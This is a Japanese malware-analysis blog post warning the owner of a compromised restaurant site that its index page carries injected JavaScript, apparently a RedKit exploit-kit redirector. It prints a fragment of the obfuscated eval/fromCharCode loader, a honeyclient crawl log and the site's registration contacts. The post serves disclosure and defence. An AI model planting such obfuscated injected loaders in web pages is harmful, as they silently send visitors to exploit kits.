hxxp://enokizaka.jp/ hxxp://www.enokizaka.jp/ hxxp://enokizaka.jp/index.html hxxp://www.enokizaka.jp/index.html↑はやめに感染コードを外して下さい。それと、
FTPアカウントを変更した方がいいと思います。
連絡先↓
[登録者名] えのき坂 [登録年月日] 2009/04/01 [有効期限] 2013/04/30 [状態] Active [最終更新] 2012/05/01 01:05:01 (JST) [名前] 有限会社たけかわ企画 [Name] Takekawa Kikaku Inc [Email] info@takenet.or.jp [郵便番号] 508-0041 [住所] 岐阜県中津川市本町2-4-22 [Postal Address] 2-4-22,Honmachi,Nakatsugawa,Gifu,JP [電話番号] 0573-62-0050index.htmlのライン113にマルウェアJSコードがあります、見た目は↓
</html><script>/*km0ae9gr6m*/window.eval(String.fromChar ,59,105,102,40,33,39,39,46,114,101,112,108,97,99,101,40, 4,101,112,108,97,99,101,40,110,101,119,32,82,101,103,69, 4,67,44,49,99,44,97,44,107,44,72,44,75,44,49,107,44,112, 51,44,48,44,49,55,44,111,44,100,44,48,44,57,44,52,44,104 4,48,44,57,44,52,44,104,44,55,44,71,44,112,44,51,44,48,4 ,44,121,44,97,44,52,44,73,44,48,44,49,56,44,48,44,57,44, 4,77,44,51,44,103,44,97,44,49,65,44,51,44,50,112,44,69,4 ,44,97,44,65,44,51,44,77,44,51,44,50,101,44,49,82,44,50, ,49,102,44,75,44,49,104,44,48,44,72,44,49,52,44,69,44,55解けたら明確にマルウェア感染コードを見えます↓
ブラウザー・シムレーターでは感染の発見があると分からない↓、ですが…
19:58:46 [hxxp] URL: hxxp://enokizaka.jp/ (Status: 200, Referrer: None)
19:58:46 [hxxp] URL: hxxp://enokizaka.jp/ (Content-type: text/html, MD5: 000bcb872c056f3702e80cab6dbbfeb6)
19:58:49 <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" å" width="850">//download.macromedia.c
<param name="movie" value="image/enokisaka.swf"></param>ht="300" title="ãˆã®ã
<param name="quality" value="high"></param><param name="LOOP" value="false"></param>
<embed height="300" loop="false" pluginspage="hxxp://www.macromedia.com/go/getflashplayer" quality="high" src="image/enokisaka.swf" type="application/x-shockwave-flash" width="850"></embed>
</object>
19:58:49 [Shellcode Analysis] URL Detected: hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0
19:58:49 [hxxp] URL: hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:58:49 [hxxp Redirection (Status: 302)] Content-Location: hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0 --> Location: hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
19:58:49 [hxxp] URL: hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Content-type: text/plain; charset=UTF-8, MD5: 669ce904c62ec9f546561f8ad5dcd5b9)Exception UnicodeEncodeError: UnicodeEncodeError('ascii', u'\u3048\u306e\u304d\u5742', 0, 4, 'ordinal not in range(128)') in 'pylibemu.Emulator.run' ignored
19:58:49 <meta content="text/html; charset=utf-8" hxxp-equiv="Content-Type"/>
19:58:49 <meta content="text/css" hxxp-equiv="Content-Style-Type"/>
19:58:49 <meta content="text/å,蕎麦,å¦»ç± ,妻ç¯,食事,木曽,木曽路,å’Œè“å,ãŠã¿ã‚„ã’,ä¸å±±é“,ä¸ä»™é“" name="keywords"/><meta content="ãˆã®ã
19:58:49 <link href="base.css" rel="stylesheet" type="text/css"/>
19:58:49 [Navigator URL Translation] base.css --> hxxp://enokizaka.jp/base.css
19:58:50 [hxxp] URL: hxxp://enokizaka.jp/base.css (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:58:50 [hxxp] URL: hxxp://enokizaka.jp/base.css (Content-type: text/css, MD5: 84f283775989f3b46ffa9173e5cae8e3)
19:59:08 <param name="movie" value="image/enokisaka.swf"></param>
19:59:08 [Navigator URL Translation] image/enokisaka.swf --> hxxp://enokizaka.jp/image/enokisaka.swf
19:59:11 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:59:11 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Content-type: application/x-shockwave-flash, MD5: 8e8208b561fbf74c95046deee6844269)
19:59:24 <param name="quality" value="high"></param>
19:59:24 <param name="LOOP" value="false"></param>
19:59:24 <embed height="300" loop="false" pluginspage="hxxp://www.macromedia.com/go/getflashplayer" quality="high" src="image/enokisaka.swf" type="application/x-shockwave-flash" width="850"></embed>
19:59:24 [Navigator URL Translation] image/enokisaka.swf --> hxxp://enokizaka.jp/image/enokisaka.swf
19:59:26 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:59:26 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Content-type: application/x-shockwave-flash, MD5: 8e8208b561fbf74c95046deee6844269)
19:59:43 [Shellcode Analysis] URL Detected: hxxp://www.google-analytics.com/ga.js
19:59:43 [hxxp] URL: hxxp://www.google-analytics.com/ga.js (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:59:43 [hxxp] URL: hxxp://www.google-analytics.com/ga.js (Content-type: text/javascript, MD5: 8cfe61bbf8631fe69a99b68d8313e8ac)
19:59:44 [Window] Eval argument length > 64 (4997)
19:59:44 [AST]: Eval argument length > 64実は本件のOBFSコードが非常に複雑に作られました。PseudoRandomドメイン感染(RedKit Exploit Kit経由)の感染仕組みでした。
どんな複雑かというと↓
randomドメイン→JS/obfs1→JS/obfs2→JS/packer→もう一度JS/obfs3 = この感染コードです。
クラックした時に私の海外経由で一応やりましたので、私の英語マルウェアブログを
解ける方法として書きましたので、このURLで見て下さい→http://malwaremustdie.blogspot.jp/2012/10/decoding-multilayer-javascript-packed.html
0 件のコメント:
コメントを投稿